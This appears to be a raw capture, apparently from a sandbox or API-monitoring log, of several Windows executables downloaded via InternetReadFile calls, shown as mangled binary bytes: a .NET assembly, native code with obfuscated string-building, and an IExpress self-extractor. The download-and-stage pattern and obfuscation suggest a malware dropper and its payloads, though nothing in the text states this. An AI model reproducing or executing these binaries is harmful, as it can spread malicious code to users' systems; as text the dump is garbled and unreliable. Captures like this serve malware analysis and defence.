ÇEøR\EÇEü–õrõ‹Eø‹Mü‰M¬‰E¨ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M ‰MìM ‰EèQWMà)M )… ÿÿÿDž0ÿÿÿDž4ÿÿÿŠA„Àuù+ʍE QP ÿÿÿè•ÇEøé½îžWÀÇEüÏ(yA‹Eø‹Mü‰M”‰EÇEøbEÇEü–õrõ‹Eø‹Mü‰Mœ‰E˜ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M‰MìM‰EèQWMà)M…8ÿÿÿDžHÿÿÿDžLÿÿÿ€ŠA„Àuù+ʍEQP8ÿÿÿèǔÇEøá½ú•WÀÇEüÔ9rw‹Eø‹Mü‰tÿÿÿ‰…pÿÿÿÇEøch)ÇEüù…‹Eø‹Mü‰|ÿÿÿ‰…xÿÿÿÇEø9ŸêÇEü‘q‹Eø‹Mü‰M„‰E€ÇEø°ú‹ÇEüÔµ ‹Eø‹Mü‰MŒ‰EˆÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøEÇEü–õrõ‰EЋEø‰MԋMüÇEøWëêÇEü‘q‰E؋Eø‰M܋MüÇEø°ú‹‰Eà‰MäÇEüÔµ ‹Eø‹Mü(pÿÿÿWMÐ)pÿÿÿ(M€‰M썍pÿÿÿ‰EèQWMà)M€)…PÿÿÿDž`ÿÿÿDždÿÿÿfDŠA„Àuù+ʍ…pÿÿÿQPPÿÿÿ脓…ðþÿÿÇt8PhÿÿÿÇx8P+ÈÇ|8P¸«ªª*÷éÁú‹òÁîòtcþªªª ‡ÌV¹t8PèÎÝ‹ø v…ðþÿÿ‰=t8P‰=x8P ω |8Phÿÿÿ;Át‹ðfV‹Ï豃ƍ…hÿÿÿƒÇ;ðuè‰=x8P¿µhÿÿÿ€‹NüvèOƒùr'‹Aùr‹PüƒÁ#+ƒÀüƒøw7‹ÂQPèÅD ƒÄÇFÇFÆ…ÿu¸hàöMèíF ƒÄ_^‹å]‹ã[Ãè™ èXÛÌÌÌÌÌÌÌÌS‹ÜƒìƒäðƒÄU‹k‰l$‹ìì˜VWÇEøõ½í‘WÀÇEüÒ%8K‹Eø‹Mü‰M¤‰E ÇEøkrEÇEü–õrõ‹Eø‹Mü‰M¬‰E¨ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M ‰MìM ‰EèQWMà)M )…pþÿÿDž€þÿÿDž„þÿÿŠA„Àuù+ʍE QPpþÿÿ葑ÇEø‹¤ü„WÀÇEüË'so‹Eø‹Mü‰dÿÿÿ‰…`ÿÿÿÇEøg}*ÇEü㛆‹Eø‹Mü‰lÿÿÿ‰…hÿÿÿÇEøy“ì†ÇEü‘q‹Eø‹Mü‰tÿÿÿ‰…pÿÿÿÇEø°ú‹ÇEüÔµ ‹Eø‹Mü‰|ÿÿÿ‰…xÿÿÿÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøEÇEü–õrõ‰EЋEø‰MԋMüÇEøWëêÇEü‘q‰E؋Eø‰M܋MüÇEø°ú‹‰Eà‰MäÇEüÔµ ‹Eø‹Mü(`ÿÿÿWMЉM썍`ÿÿÿ‰EèQ)`ÿÿÿ(MàWpÿÿÿ)pÿÿÿ…ˆþÿÿDž˜þÿÿDžœþÿÿŠA„Àuù+ʍ…`ÿÿÿQPˆþÿÿèBÇEøõ§àØWÀÇEüÃ&z3‹Eø‹Mü‰M”‰EÇEøEÇEü–õrõ‹Eø‹Mü‰Mœ‰E˜ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M‰MìM‰EèQWMà)M)… þÿÿDž°þÿÿDž´þÿÿŠA„Àuù+ʍEQP þÿÿ葏ÇEøõ§àªÇEüË9yU‹Eø‹Mü‰…0ÿÿÿ‰4ÿÿÿÇEøor6ÇEüʑ“‹Eø‹Mü‰…8ÿÿÿ‰<ÿÿÿÇEø6žížÇEüÍcr‹Eø‹Mü‰…@ÿÿÿ‰DÿÿÿÇEøßo”ÿÇEü§›Xd‹Eø‹Mü‰…Hÿÿÿ‰LÿÿÿÇEøu3¯DÇEüÏÐHT‹Eø‹Mü‰…Pÿÿÿ‰TÿÿÿÇEøŠ˜¦§ÇEüZm;1‹Eø‹Mü‰…Xÿÿÿ‰\ÿÿÿÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøEÇEü–õrõ‰EÀ‹Eø‰MċMüÇEøWëêÇEü‘q‰EȋEø‰M̋MüÇEø°ú‹ÇEüÔµ ‰EЋEø‰MԋMüÇEø3¯DÇEüÏÐHT‰E؋Eø‰M܋MüÇEøŠ˜¦§ÇEüZm;1‰Eà‹Eø‰Mä‹Mü(0ÿÿÿWMÀ‰Eè‰Mì)0ÿÿÿ(@ÿÿÿ0ÿÿÿWMЍQ)@ÿÿÿWÀ(PÿÿÿWMà)Pÿÿÿ…¸þÿÿDžÈþÿÿDžÌþÿÿŠA„Àuù+ʍ…0ÿÿÿQP¸þÿÿ輍ÇEøõ§àÝWÀÇEü•3{_‹Eø‹Mü‰M„‰E€ÇEøEÇEü–õrõ‹Eø‹Mü‰MŒ‰EˆÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M€‰MìM€‰EèQWMà)M€)…ÐþÿÿDžàþÿÿDžäþÿÿ@ŠA„Àuù+ʍE€QPÐþÿÿèÇEøõ§àÝÇEüç;d\‹Eø‹Mü‰…ÿÿÿ‰ÿÿÿÇEø`w ÇEü婐‹Eø‹Mü‰…ÿÿÿ‰ ÿÿÿÇEø1Šô†ÇEüå^r‹Eø‹Mü‰…ÿÿÿ‰ÿÿÿÇEøÓuåÇEü Æq‹Eø‹Mü‰…ÿÿÿ‰ÿÿÿÇEøt_¯DÇEüÏÐHT‹Eø‹Mü‰… ÿÿÿ‰$ÿÿÿÇEøŠ˜¦§ÇEüZm;1‹Eø‹Mü‰…(ÿÿÿ‰,ÿÿÿÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøEÇEü–õrõ‰EÀ‹Eø‰MċMüÇEøWëêÇEü‘q‰EȋEø‰M̋MüÇEø°ú‹ÇEüÔµ ‰EЋEø‰MԋMüÇEø3¯DÇEüÏÐHT‰E؋Eø‰M܋MüÇEøŠ˜¦§ÇEüZm;1‰Eà‹Eø‰Mä‹Mü
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¢© ðà 0t>“ @ à@…è’S ÞÀ  H.textDs t `.rsrcÞ v@@.reloc À|@B “H´¯4ãC0 s ~%-&~þs %€(+o 8Ìo %  %Ð ( s ¢% %Ð( s ¢% %Ð( s ¢(o 8F( s s,~ }~  s ( o }{ %Ð( s o , %Ðý( s +O > %ÐÊ( s rp~ ( ( o -{(+ {(( :Vo ( o o ( {(( :\(+, %\o (+o o"þ s ~%-&~þs %€(+o$þ s ~%-&~þs %€(+o*þ s ~%-&~þs %€(+o&þ s ~%-&~þs! %€(+o(Þ&Þo+-o" (# :®ýÿÿÞþo$ Üo% :)ýÿÿÞ ,o$ ÜÞ&Þ*AdÉ Ò›Yô1Þ 0|s&   %Ð ( s (' (( - ÝG( soÿs« %ÐÔ( s o±&8ÜsKo­o) oFo­o) oHo­(oJÞ&ÞÞjoE(* - oE+rpoFoG(* - oG+rpoHoI(* - oI+rpoJÜoIrp(+ ,o, Xoª?ÿÿÿÞ&ÞÞ ,o$ ÜÞ&Þ* *A|}EÂ}JÇjA!bA&g ou0`s-  %Ð( s (' (( - Ý,( soÿs« %Ðÿ( s o±&8Ás; %Ðë( s o¬o) o. %Ðë( s o¬o) r)po. o0 %Ð+( s o¬o) o2  %Ð( s o¬r-po o4  %Ðñ( s o¬o) (/ @Bj[!‘¶Yo6 %Ð( s o¬o) o8 %ÐÑ( s o¬(o:o5j/*(0    (1   (2 !€µ÷õŸYo6Þ&Þ-+(9(* -o3 Xoª?1þÿÿÞ&ÞÞ ,o$ ÜÞ&Þ* *Adx˜@F@ K SY0fs4  %Ð( s (' (( - Ý2( soÿs« %ÐÄ( s o±&8Ǎ %Ðá( s o¬o)  %ÐÙ( s o. - %Ð( s o. , (s   %Ð( s o¬o) o o Þ&Þ,o5 Xoª?+ÿÿÿÞ&ÞÞ ,o$ ÜÞ&Þ* *Adx¯'@ L@Q Y_0®s6  %Ð( s (' (( - Ýz( soÿs«r1pr[p~ ( o±&8 %Ð( s o¬(rap~ o sD    %ÐÐ( s o¬o) o=  %Ðâ( s rep~ ( o¬o) (7 o?  %ÐÅ( s rep~ ( o¬o) (7 oA oC Þ&Þ,o8 Xoª?áþÿÿÞ&ÞÞ ,o$ ÜÞ&Þ* *Advùo@T”@Y™ ¡§0@~ o v3o 13(9 () +(2o) Þ&Þ*5;0' o: +o: X 1*o; ,æ*0ñ~ ~ %rop¢o< ŽiY(+( +  -$rop(? rsp(' (( -\ X +Ù 3rsp(' (( -> X +» 3$rop(? r‹p(' (( - X +“ 3r‹p(' ((
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $÷—zc³ö0³ö0³ö0øŽ1²ö0øŽ1²ö0¦‰1éö0¦‰1¡ö0¦‰1«ö0øŽ1¸ö0øŽ1ö0øŽ1«ö0³ö0]ö0øŽ1¨ö0…v1¹ö0…vë0²ö0…v1²ö0Rich³ö0PEL”â/eà %ò *` @p@<`àp\ñ¸8¹з@ü.textPð ò  `.rdataZö @@.data0 ú@À.rsrcà`@@.reloc\ñpò@BS‹ÜƒìƒäðƒÄU‹k‰l$‹ììVWÇEøá½ú•WÀÇEüÔ9r3‹Eø‹Mü‰MĉEÀÇEøEÇEü–õrõ‹Eø‹Mü‰M̉EÈÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(MÀ‰MìMÀ‰EèQWMà)MÀ)…ðþÿÿDžÿÿÿDžÿÿÿŠA„Àuù+ʍEÀQPðþÿÿèá–ÇEøá½ú•WÀÇEüÔ9rp‹Eø‹Mü‰M´‰E°ÇEøgp7ÇEüïõrõ‹Eø‹Mü‰M¼‰E¸ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M°‰MìM°‰EèQWMà)M°…ÿÿÿDžÿÿÿDžÿÿÿŠA„Àuù+ʍE°QPÿÿÿè0–ÇEøá½ú•WÀÇEüÔ9rc‹Eø‹Mü‰M¤‰E ÇEøR\EÇEü–õrõ‹Eø‹Mü‰M¬‰E¨ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M ‰MìM ‰EèQWMà)M )… ÿÿÿDž0ÿÿÿDž4ÿÿÿŠA„Àuù+ʍE QP ÿÿÿè•ÇEøé½îžWÀÇEüÏ(yA‹Eø‹Mü‰M”‰EÇEøbEÇEü–õrõ‹Eø‹Mü‰Mœ‰E˜ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M‰MìM‰EèQWMà)M…8ÿÿÿDžHÿÿÿDžLÿÿÿ€ŠA„Àuù+ʍEQP8ÿÿÿèǔÇEøá½ú•WÀÇEüÔ9rw‹Eø‹Mü‰tÿÿÿ‰…pÿÿÿÇEøch)ÇEüù…‹Eø‹Mü‰|ÿÿÿ‰…xÿÿÿÇEø9ŸêÇEü‘q‹Eø‹Mü‰M„‰E€ÇEø°ú‹ÇEüÔµ ‹Eø‹Mü‰MŒ‰EˆÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøEÇEü–õrõ‰EЋEø‰MԋMüÇEøWëêÇEü‘q‰E؋Eø‰M܋MüÇEø°ú‹‰Eà‰MäÇEüÔµ ‹Eø‹Mü(pÿÿÿWMÐ)pÿÿÿ(M€‰M썍pÿÿÿ‰EèQWMà)M€)…PÿÿÿDž`ÿÿÿDždÿÿÿfDŠA„Àuù+ʍ…pÿÿÿQPPÿÿÿ脓…ðþÿÿÇt8PhÿÿÿÇx8P+ÈÇ|8P¸«ªª*÷éÁú‹òÁîòtcþªªª ‡ÌV¹t8PèÎÝ‹ø v…ðþÿÿ‰=t8P‰=x8P ω |8Phÿÿÿ;Át‹ðfV‹Ï豃ƍ…hÿÿÿƒÇ;ðuè‰=x8P¿µhÿÿÿ€‹NüvèOƒùr'‹Aùr‹PüƒÁ#+ƒÀüƒøw7‹ÂQPèÅD ƒÄÇFÇFÆ…ÿu¸hàöMèíF ƒÄ_^‹å]‹ã[Ãè™ èXÛÌÌÌÌÌÌÌÌS‹ÜƒìƒäðƒÄU‹k‰l$‹ìì˜VWÇEøõ½í‘WÀÇEüÒ%8K‹Eø‹Mü‰M¤‰E ÇEøkrEÇEü–õrõ‹Eø‹Mü‰M¬‰E¨ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M ‰MìM ‰EèQWMà)M )…pþÿÿDž€þÿÿDž„þÿÿŠA„Àuù+ʍE QPpþÿÿ葑ÇEø‹¤ü„WÀÇEüË'so‹Eø‹Mü‰dÿÿÿ‰…`ÿÿÿÇEøg}*ÇEü㛆‹Eø‹Mü‰lÿÿÿ‰…hÿÿÿÇEøy“ì†ÇEü‘q‹Eø‹Mü‰tÿÿÿ‰…pÿÿÿÇEø°ú‹ÇEüÔµ ‹Eø‹Mü‰|ÿÿÿ‰…xÿÿÿÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøEÇEü–õrõ‰EЋEø‰MԋMüÇEøWëêÇEü‘q‰E؋Eø‰M܋MüÇEø°ú‹‰Eà‰MäÇEüÔµ ‹Eø‹Mü(`ÿÿÿWMЉM썍`ÿÿÿ‰EèQ)`ÿÿÿ(MàWpÿÿÿ)pÿÿÿ…ˆþÿÿDž˜þÿÿDžœþÿÿŠA„Àuù+ʍ…`ÿÿÿQPˆþÿÿèBÇEøõ§àØWÀÇEüÃ&z3‹Eø‹Mü‰M”‰EÇEøEÇEü–õrõ‹Eø‹Mü‰Mœ‰E˜ÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M‰MìM‰EèQWMà)M)… þÿÿDž°þÿÿDž´þÿÿŠA„Àuù+ʍEQP þÿÿ葏ÇEøõ§àªÇEüË9yU‹Eø‹Mü‰…0ÿÿÿ‰4ÿÿÿÇEøor6ÇEüʑ“‹Eø‹Mü‰…8ÿÿÿ‰<ÿÿÿÇEø6žížÇEüÍcr‹Eø‹Mü‰…@ÿÿÿ‰DÿÿÿÇEøßo”ÿÇEü§›Xd‹Eø‹Mü‰…Hÿÿÿ‰LÿÿÿÇEøu3¯DÇEüÏÐHT‹Eø‹Mü‰…Pÿÿÿ‰TÿÿÿÇEøŠ˜¦§ÇEüZm;1‹Eø‹Mü‰…Xÿÿÿ‰\ÿÿÿÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøEÇEü–õrõ‰EÀ‹Eø‰MċMüÇEøWëêÇEü‘q‰EȋEø‰M̋MüÇEø°ú‹ÇEüÔµ ‰EЋEø‰MԋMüÇEø3¯DÇEüÏÐHT‰E؋Eø‰M܋MüÇEøŠ˜¦§ÇEüZm;1‰Eà‹Eø‰Mä‹Mü(0ÿÿÿWMÀ‰Eè‰Mì)0ÿÿÿ(@ÿÿÿ0ÿÿÿWMЍQ)@ÿÿÿWÀ(PÿÿÿWMà)Pÿÿÿ…¸þÿÿDžÈþÿÿDžÌþÿÿŠA„Àuù+ʍ…0ÿÿÿQP¸þÿÿ輍ÇEøõ§àÝWÀÇEü•3{_‹Eø‹Mü‰M„‰E€ÇEøEÇEü–õrõ‹Eø‹Mü‰MŒ‰EˆÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøE‰Eà‰MäÇEü–õrõ‹Eø‹Mü(M€‰MìM€‰EèQWMà)M€)…ÐþÿÿDžàþÿÿDžäþÿÿ@ŠA„Àuù+ʍE€QPÐþÿÿèÇEøõ§àÝÇEüç;d\‹Eø‹Mü‰…ÿÿÿ‰ÿÿÿÇEø`w ÇEü婐‹Eø‹Mü‰…ÿÿÿ‰ ÿÿÿÇEø1Šô†ÇEüå^r‹Eø‹Mü‰…ÿÿÿ‰ÿÿÿÇEøÓuåÇEü Æq‹Eø‹Mü‰…ÿÿÿ‰ÿÿÿÇEøt_¯DÇEüÏÐHT‹Eø‹Mü‰… ÿÿÿ‰$ÿÿÿÇEøŠ˜¦§ÇEüZm;1‹Eø‹Mü‰…(ÿÿÿ‰,ÿÿÿÇEø¥Ô‰öÇEü»K3‹Eø‹MüÇEøEÇEü–õrõ‰EÀ‹Eø‰MċMüÇEøWëêÇEü‘q‰EȋEø‰M̋MüÇEø°ú‹ÇEüÔµ ‰EЋEø‰MԋMüÇEø3¯DÇEüÏÐHT‰E؋Eø‰M܋MüÇEøŠ˜¦§ÇEüZm;1‰Eà‹Eø‰Mä‹Mü
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $×â%‡“ƒKԓƒKԓƒKÔöåNՒƒKÔöåHՒƒKÔöåOՇƒKÔöåJՂƒKԓƒJÔ ƒKÔöåC՚ƒKÔöå´Ô’ƒKÔöåIՒƒKÔRich“ƒKÔPELâ`bà  d`j€@ À`í@Á Œ¢´À|î°ˆT@ ˆ.textcd `.dataH€h@À.idataR j@@.rsrcðÀð|@@.relocˆ° l@B‚@P‚@¤€@p@ˆ¢@È@u j@°i@@o@àÀ012P4ð4B€IPJÐJ`KÀK LÀLÐLàO€cÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32*...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øœœâ`bprRSDSºÍã÷æÎÍú1‚ òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat .rdata$zzzdbg€8\.text$mn¸r\.xdata$x€à.dataàh.bss ˆ.idata$5ˆ¢.00cfgŒ¢ .idata$2,£.idata$3@£ˆ.idata$4È¥Š .idata$6À.rsrc$01Ä ‰.rsrc$02‹ÿU‹ì3À…Òtúÿÿÿv¸W€…Àx QÿuQèÛë…ÒtÆ]‹ÿU‹ìSVW3ÿ»W€‹÷…Òtúÿÿÿv‹ó…öx?‹ò‹Á…Òt €8t@ƒîuõ‹þ‹Â÷Þö+ǁæ©ÿøó÷ßÿ#ø…öxQÿu+×QÏèn‹ð_‹Æ^[]‹ÿU‹ì‹E V3ö…Àt=ÿÿÿv¾W€…öx5S‹]3öWxÿEPÿuWSÿ|¢@ƒÄ…Àx;Çwu ë¾z€Æ_[ë …Àt‹MÆ‹Æ^]ËÿU‹ì…Òt&‹E SV¾þÿÿ+Á…ötŠ„Ût ˆANƒêuì^[…ÒuI÷ÚÆҁâ†ÿø‚z€] ‹ÿU‹ì9Mr‹Eº+Á;Âw+M ë3À]‹ÿU‹ìƒì¡€@3ʼnEüSVW3ÀfÇEø‹ñ‰EôhD@‰uè‹Øÿx @‹ø…ÿtjhT@Wÿœ @‰Eð…ÀtP3ɍEìPQQQQQQh j jEô‰PCÿ$ @…Àt*‹Mð‹ôÿuèÿuìjÿˆ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @‹Mü‹Ã_^3Í[èAT‹å]ËÿU‹ìƒì¡€@3ʼnEü¡(@SWj3ÛfÇEø_‰]ô‰]ð;Ç…ôMðèÿÿÿ…À…ӍEèPjÿ¡@Pÿ @…À„ɍEìPSSWÿuèÿ @…À…’ÿl @ƒøz…ƒVÿuìSÿP¡@‹ð…ötqEìPÿuìVWÿuèÿ @…ÀtTEäPSSSSSSh j WEôPÿ$ @…Àt49v'~ÿuäÿ7ÿ, @…Àu CƒÇ;réë 3À@£(@‰Eðÿuäÿ @Vÿ¤ @^ÿuèÿˆ @‹Eðë‹Eð…Àt Ç(@‹Mü_3Í[è S‹å]ÃÌÌÌÌÌÌ̋ÿU‹ìì¡€@3ʼnEü‹E V‹u-t!ƒèu‹UŠÃ÷ÿÿƒùw RVÿà¡@ëP3ÀëOÿÌ¡@‹Ð‹Îè)h…üýÿÿƅüýÿÿPÿuÿ5<š@ÿè¡@…üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@‹Mü3Í^èbR‹å]‹ÿU‹ìQS‹Á‹ÚVW‰Eü3ÿ‹0ë€>tFf¾‹ËèÔK…Àuë‹Eüf¾‰0ë3Àë#€<7tGf¾7‹Ëè®K…Àté7€8tÆ@_^[‹å]ËÿU‹ìì¡€@3ʼnEü‹EºSV‹Ù‰…èùÿÿ‹E ôýÿÿWS‰…ìùÿÿè[ûÿÿ€½ôýÿÿ"u ºl@…õýÿÿë ºp@…ôýÿÿðùÿÿ‰…ðùÿÿè-ÿÿÿ‹µðùÿÿ‹ø…öt<‹ÎQŠA„Àuù+ʃùr)ŠF<:u€~\t €>\u<\uVºøþÿÿèãúÿÿë(Qhä‘@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.Z‹Îè÷J…À„šjÿht@jÿPjjÿh @Hƒè…|…øþÿÿPÿ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $j}¼¹.Òê.Òê.ÒêedÑë+Òêed×ë—Òê;cÖë?Òê;cÑë$Òê;c×ëuÒêedÖë<ÒêedÔë/ÒêedÓë%Òê.Óê¤ÒêœÛë<Òêœ-ê/ÒêœÐë/ÒêRich.ÒêPEd†ùý;eð" %>ô ‡@€)Q`,¨<0T1ð$p„ àa8€b( `@P.text¾<> `.rdatabbPdB@@.data¼,À¦@À.pdata$ð$º@@_RDATA\ Þ@@.rsrcT102à@@.reloc„ p @BHƒì(HµäIÇÀÿÿÿÿIÿÀB€<uöH íÛèH!H Ñ4HƒÄ(é€{ÌÌÌÌÌÌÌÌ@SHƒì`H‹S°H3ÄH‰D$XfoÓOfo +PfoPÇD$P§¾¡eH‹%XH‹º`‹ »8HÙ¨uUƒÈ‰ ÆC4HC3HL$SH;ÙwHL$ H;ÁrKS ‹D$P‰C0ëKS ‹D$P‰C0H ü4èÿwH‹ËèžTWÀ´ÚWÉó ¹ÚIÇÀÿÿÿÿfIÿÀB€<uöH‹ÓH ŒÚèG H @4èƒzH‹L$XH3ÌènvHƒÄ`[ÃÌÌÌÌÌÌÌÌHƒì(è''H‹Èè/SWÀWÉ‚ÚIÇÀÿÿÿÿó ƒÚIÿÀB€<uöH‹ÑH \Úè×H p4HƒÄ(ézÌÌÌÌÌÌÌHƒì(è·'H‹ÈèÏQWÀWÉÚIÇÀÿÿÿÿó ÚIÿÀB€<uöH‹ÑH ÜÙèwH °4HƒÄ(é¯yÌÌÌÌÌÌÌHƒì(H…IÇÀÿÿÿÿIÿÀB€<uöH ]Úè8H Q6HƒÄ(épyÌÌÌÌÌÌÌÌ@SHƒì`H‹C®H3ÄH‰D$XfoÃMfo NfoNÇD$P§¾¡eH‹%XH‹º‹ »`HÙ¨uUƒÈ‰ ÆC4HC3HL$SH;ÙwHL$ H;ÁrKS ‹D$P‰C0ëKS ‹D$P‰C0H |6èïuH‹ËèŽRWÀ$ÙWÉó )ÙIÇÀÿÿÿÿfIÿÀB€<uöH‹ÓH üØè7H À5èsxH‹L$XH3Ìè^tHƒÄ`[ÃÌÌÌÌÌÌÌÌHƒì(è_H‹ÈèQWÀWÉòØIÇÀÿÿÿÿó óØIÿÀB€<uöH‹ÑH ÌØèÇH ð5HƒÄ(éÿwÌÌÌÌÌÌÌ@SHƒì`H‹Ó¬H3ÄH‰D$XfoSKfo {Kfo£KÇD$P0û®§fÇD$T IeH‹%XH‹ºÔ‹ »ØHÙ¨ugƒÈ‰ ÆC6HC5HL$UH;Ùw'HL$ H;ÁrKS ‹D$P‰C0·D$Tf‰C4ëKS ‹D$P‰C0·D$Tf‰C4H 36èftH‹Ëèå^WÀ»×WÉó À×IÇÀÿÿÿÿf„IÿÀB€<uöH‹ÓH Œ×è§H p5èãvH‹L$XH3ÌèÎrHƒÄ`[ÃHƒì(H í½è`_H Ý5HƒÄ(é°vH 56é¤vH Í5é˜vHƒì(A¹Hï¿E3ÀH u¿èRH =6HƒÄ(éhv@SHƒì ¹èì÷H ¹¿H‹ØèÁH2BE3ÀH‹ÓH‰¿H –¿è‘JH B6HƒÄ [évH‹ ¿H¿H‰‹ÂHcHH‹xÂH‰DPH‹ä¾HcHƒLÃÌÌHƒì(H ½¾èp^H õ5HƒÄ(éÀuHƒì(A¹H§ÀE3ÀH -Àè¸QH Ñ5HƒÄ(éu@SHƒì ¹è÷H qÀH‹ØèéHZAE3ÀH‹ÓH‰UÀH NÀè¹IH Ö5HƒÄ [é@uH‹±ÁLº¿L‰«ÁH…ÒtH‹HcHL‰DPL‹“ÁH‹”ÁH…Òt H‹HcHL‰DPÃÌÌHƒì(H e¿èˆ]H y5HƒÄ(éØtHƒì(H …Áèh]H ¥5HƒÄ(é¸tH U5é¬tÌÌÌÌH ™5éœtÌÌÌÌHIÔÃÌÌÌÌÌÌÌÌ@SHƒì H‹ÙH‹ÂH …=WÀHSH‰ HHèw‹H‹ÃHƒÄ [ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌH‹QH-ÜH…ÒHEÂÃÌÌÌÌÌÌÌÌÌÌÌÌÌH‰\$WHƒì H'=H‹ùH‰‹ÚHƒÁ讋öÃt ºH‹Ïè pH‹\$0H‹ÇHƒÄ _ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHá<H‰HƒÁém‹ÌÌÌÌÌÌÌÌÌÌÌÌÌH¹ÛHÇAH‰AH6=H‰H‹ÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌHƒìHHL$ èÂÿÿÿHˏHL$ èŌÌ@SHƒì H‹ÙH‹ÂH e<WÀHSH‰ HHèWŠHÐ<H‰H‹ÃHƒÄ [ÃÌÌÌÌ@SHƒì H‹ÙH‹ÂH %<WÀHSH‰ HHèŠH <H‰H‹ÃHƒÄ [ÃÌÌÌÌHƒì(H ýÚèH]ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ@SHƒì@H‹£§H3ÄH‰D$0L‹ÂÆD$(HQL‰D$ H«;H‹ÙH‰WÀHL$ 蝉Hþ;H‰H‹ÃH‹L$0H3ÌècnHƒÄ@[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌ@SHƒì H‹ÙH‹ÂH U;WÀHSH‰ HHèG‰H¨;H‰H‹ÃHƒÄ [ÃÌÌÌÌD‰H‹ÂH‰JÃÌÌÌÌÌ@SHƒì0H‹I‹ØD‹ÂHT$ ÿPH‹KL‹HH‹QI9Qu‹ 9u°HƒÄ0[Ã2ÀHƒÄ0[ÃÌH‹BL‹HL9IuD9u°Ã2ÀÃÌÌÌÌÌÌÌH‰²‰H‰AH‹ÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ@SVWHì°)´$ H‹V¦H3ÄH‰„$H‹òH‹ÙH‰Œ$€I‹ÐHL$`è0 H‹øH‰„$€6HƒxtA¸HVÙH‹ÈèÖH‹NH‹fA~ðHT$@ÿPHT$@Hƒ|$XHCT$@L‹D$PH‹Ï裐H‹T$XHƒúr2HÿÂH‹L$@H‹ÁHúrHƒÂ'H‹IøH+ÁHƒÀøHƒø‡ùèÅlWÀD$ WÉóL$0D$ OL$0HÇGHÇGÆHD$ Hƒ|$8HCD$ H p9H‰ HSWÀH‰„$€Æ„$ˆHŒ$€èN‡H¯9H‰H‹T$8Hƒúr.HÿÂH‹L$ H‹ÁHúrHƒÂ'H‹IøH+ÁHƒÀøHƒøw9è lH¬:H‰sH‹ÃH‹Œ$H3ÌèÊk(´$ HÄ°_^[Ãè~ߐè
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†=Ì:eð. nW @ ÀW`…@@  WV H.text¤lW nW `.rsrcV WpW@@H@`Wd,@LþW*(*(*( *&~þ*~*.s €*( *Fo rp(! *&~þ*~*&~þ*~*.þ (# *Nþ þ þ ($ *:þ þ o% *&~ þ*~ *(0 *.þ (1 *.þ (2 *.þ (3 *(4 *>þ þ (- *.þ (5 **þ o6 **þ o7 *.þ (8 **þ o9 *.þ (: **þ o *&~þ*~*&~þ*~*.þ (G *Jþ þ þ oH **þ oI **þ oJ *.þ (*(K *&~þ*~*~*€*j(Crmp~(Dt*&~þ*~*(=*Jþ þ þ oN *(G*&~…þ*~…*0£ þ8þ Eo2Y8j|(+ ~€{B:Äÿÿÿ& 8¹ÿÿÿ} 